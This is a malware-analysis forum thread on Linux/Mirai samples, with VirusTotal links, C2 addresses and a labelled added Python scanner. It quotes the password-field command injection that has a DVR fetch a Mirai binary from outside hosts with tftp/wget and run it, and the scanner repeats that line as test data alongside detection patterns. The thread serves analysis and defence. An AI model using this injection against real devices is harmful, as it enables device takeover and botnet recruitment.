A forum for reverse engineering, OS internals and malware analysis 

 #29236  by Xylitol
 Sat Sep 17, 2016 1:28 pm
MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html

Samples from the article:
ARM: https://www.virustotal.com/en/file/65de ... 474118654/
ARM7: https://www.virustotal.com/en/file/c483 ... 474118647/
MIPS: https://www.virustotal.com/en/file/9304 ... 474118648/
Renesas SH: https://www.virustotal.com/en/file/1bf9 ... 474118651/
PowerPC: https://www.virustotal.com/en/file/c61b ... 474118650/
SPARC: https://www.virustotal.com/en/file/d957 ... 474118708/
x86: https://www.virustotal.com/en/file/2238 ... 474118710/

And also these:
ARM: https://www.virustotal.com/en/file/2727 ... 474117997/
ARM7: https://www.virustotal.com/en/file/a4b9 ... 474118004/
MIPS: https://www.virustotal.com/en/file/f110 ... 474117999/
Renesas SH: https://www.virustotal.com/en/file/b76a ... 474118000/
PowerPC: https://www.virustotal.com/en/file/849d ... 474118001/
The malware was installed on a DVR and was started with this bash injection in the password field:
Code:
Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
There are also other platform versions; change "arm" to "mips" etc.
Thanks to 0x1BE.
Attachments: infected (185.28 KiB), infected (137.68 KiB)
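As an added example (not from the post or the MMD write-up), a small Python scanner that flags the injection shape quoted above in DVR login-log lines. The log lines, the addresses in them and the indicator names are constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of DVR web-interface login attempts (not real logs).
# Line 1 mirrors the injected command from the post; line 3 is a wget-only variant.
SAMPLE_LOG = """\
2016-09-17 13:28:01 POST /login.cgi user=admin Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 203.0.113.10 || wget http://203.0.113.11/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
2016-09-17 13:28:05 POST /login.cgi user=admin Password=hunter2
2016-09-17 13:28:09 POST /login.cgi user=root Password=;wget http://203.0.113.11/bins/mirai.mips -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper
"""

# Each indicator is a separate signal so that variants (wget only, mirai.mips, ...) still match.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # password value that starts with a shell separator: the field terminates one
    # command and starts another
    "shell_in_password": re.compile(r"Password=\s*[;|&]"),
    # tftp/wget fetching a payload named mirai.<arch>
    "mirai_fetch": re.compile(r"\b(?:tftp|wget)\b[^;|]*\bmirai\.[a-z0-9]+"),
    # dropper written to /dev/dvrHelper and made world-executable
    "dev_dvrhelper": re.compile(r"/dev/dvrHelper"),
    "chmod_777": re.compile(r"chmod\s+777\s+/dev/"),
    # busybox invoked with the MIRAI marker argument
    "busybox_mirai": re.compile(r"busybox\s+MIRAI\b"),
}

ARCH_RE = re.compile(r"mirai\.([a-z0-9]+)")


def scan_line(line: str) -> List[str]:
    """Return the names of the indicators present in one log line."""
    return [name for name, pat in INDICATORS.items() if pat.search(line)]


def target_arch(line: str) -> Optional[str]:
    """Architecture suffix of the fetched payload ('arm', 'mips', ...), or None."""
    m = ARCH_RE.search(line)
    return m.group(1) if m else None


def scan_log(text: str, min_hits: int = 2) -> List[Tuple[int, List[str], Optional[str]]]:
    """Flag lines carrying at least min_hits indicators as (line_no, hits, arch)."""
    flagged = []
    for no, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if len(hits) >= min_hits:
            flagged.append((no, hits, target_arch(line)))
    return flagged


if __name__ == "__main__":
    for no, hits, arch in scan_log(SAMPLE_LOG):
        print(f"line {no}: arch={arch} indicators={', '.join(hits)}")
```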
 #29313  by Xylitol
 Sat Oct 01, 2016 9:09 pm
Attachments: infected (285.09 KiB), infected (496.33 KiB)
 #29316  by rkhunter
 Sun Oct 02, 2016 9:44 am
Xylitol wrote:MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html
Frankly speaking, I'm really glad to see that he started to do something directly related to his work, besides war with windmills, "approving" ppl on his own Twitter and spreading rumors about his own fantasies.
 #29318  by ikolor
 Sun Oct 02, 2016 10:45 am
connect here

184.51.1.18
184.51.1.19
 #29328  by ikolor
 Mon Oct 03, 2016 12:06 pm
Is there any information about a sample of the competition, the "Bashlight botnet"?
 #29330  by tWiCe
 Mon Oct 03, 2016 1:50 pm
ikolor wrote:connect here

184.51.1.18
184.51.1.19
Which one is connecting there? I see it's connecting to b0ts.xf0.pw (185.47.62.199)
 #29338  by tWiCe
 Tue Oct 04, 2016 6:56 am
ikolor wrote:Sorry, I thought I made a mistake. Analyzing this file on this website showed me these IP numbers

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/
You can't analyze ELF files on malwr.com, because it doesn't have any Linux VMs, especially for such architectures as MIPS, MIPSEL, PPC, etc.